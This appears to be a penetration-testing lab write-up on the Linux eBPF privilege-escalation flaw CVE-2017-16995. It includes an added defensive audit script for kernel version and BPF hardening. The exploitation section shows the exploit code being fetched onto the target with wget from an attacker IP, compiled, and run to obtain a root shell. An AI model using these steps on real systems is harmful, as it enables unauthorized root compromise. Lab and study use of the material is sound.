CVE-2017-16995
PEAS has identified that the target system is vulnerable to CVE-2017-16995
A vulnerability classified as critical was found in the Linux kernel up to 4.14.8. Affected is the function check_alu_op in kernel/bpf/verifier.c (sign-extension handling in the eBPF verifier). The manipulation leads to memory corruption. This vulnerability is known as CVE-2017-16995. Local access is a requirement. Furthermore, there is a public exploit available. It is recommended to upgrade the affected component.
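As an added defender's check, not part of the original write-up or of the PEAS tooling, the following POSIX shell script audits a host for the two conditions this finding depends on: a kernel release at or below the 4.14.8 bound named above, and the unprivileged bpf() syscall still enabled (kernel.unprivileged_bpf_disabled = 0). The function names and the sample release strings are my own; the sysctl path is the real one. One caveat the version check cannot capture: distribution kernels backport fixes without changing the upstream version string, so "affected" here means "check the distro's changelog", not "confirmed vulnerable".

```shell
#!/bin/sh
# Added audit helper (not from the original write-up): flags kernels in the
# version range the advisory names (up to 4.14.8) and reports whether the
# unprivileged bpf() syscall is disabled, which removes the local attack
# surface this class of verifier bug needs.

# Compare a kernel release string such as "4.4.0-31-generic" against the
# advisory's upper bound 4.14.8. Prints "affected" or "not-affected".
# Distro backports make this a first-pass indicator only.
kernel_version_status() {
    rel="$1"
    base=${rel%%-*}                         # strip "-31-generic" style suffixes
    major=$(printf '%s' "$base" | cut -d. -f1)
    minor=$(printf '%s' "$base" | cut -d. -f2)
    patch=$(printf '%s' "$base" | cut -d. -f3)
    minor=${minor:-0}; patch=${patch:-0}    # "4.14" has no patch field
    if [ "$major" -lt 4 ] \
       || { [ "$major" -eq 4 ] && [ "$minor" -lt 14 ]; } \
       || { [ "$major" -eq 4 ] && [ "$minor" -eq 14 ] && [ "$patch" -le 8 ]; }; then
        echo affected
    else
        echo not-affected
    fi
}

# Report the unprivileged-BPF hardening state from the given sysctl file
# (defaults to the live kernel). A value of 1 or 2 means unprivileged users
# cannot load BPF programs; 0 means the bpf() syscall is reachable from an
# ordinary shell, which is what a local exploit of this bug requires.
unprivileged_bpf_status() {
    f="${1:-/proc/sys/kernel/unprivileged_bpf_disabled}"
    if [ ! -r "$f" ]; then
        echo unknown                        # sysctl absent: pre-4.4 kernel or no /proc
        return
    fi
    case "$(cat "$f")" in
        0)   echo exposed ;;
        1|2) echo hardened ;;
        *)   echo unknown ;;
    esac
}

# Combine both checks for the running host. Returns non-zero only when the
# kernel is in the affected range AND unprivileged bpf() is still enabled,
# i.e. when the finding is worth escalating to a patch ticket.
audit_bpf_exposure() {
    rel=$(uname -r)
    v=$(kernel_version_status "$rel")
    b=$(unprivileged_bpf_status)
    echo "kernel $rel: $v; unprivileged bpf: $b"
    if [ "$v" = affected ] && [ "$b" = exposed ]; then
        return 1
    fi
    return 0
}

# Stand-alone usage: print the verdict and the remediation when it fails.
audit_bpf_exposure \
    || echo "action: upgrade the kernel, or set kernel.unprivileged_bpf_disabled=1 until it is patched"
```

Setting the sysctl is the stopgap, not the fix: it blocks BPF_PROG_LOAD for unprivileged users (socket filters included, which is the path the exploit output below walks), but a kernel upgrade to a release carrying the check_alu_op fix is still the recommended remediation.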
Exploit
Exploit available online
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ wget -q https://www.exploit-db.com/download/45010 ; mv 45010 CVE-2017-16995.c
Downloaded to Kali
Exploitation
loly@ubuntu:/dev/shm$ wget -q http://192.168.45.235/CVE-2017-16995.c
Delivery complete
loly@ubuntu:/dev/shm$ gcc CVE-2017-16995.c -o CVE-2017-16995
Compile
loly@ubuntu:/dev/shm$ ./CVE-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88007be42900
[*] Leaking sock struct from ffff8800792f3a40
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88007b093b40
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88007b093b40
[*] credentials patched, launching shell...
# whoami
whoami
root
# hostname
hostname
ubuntu
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens224: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:36:61 brd ff:ff:ff:ff:ff:ff
inet 192.168.120.121/24 brd 192.168.120.255 scope global ens224
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe9e:3661/64 scope link
valid_lft forever preferred_lft forever
System level compromise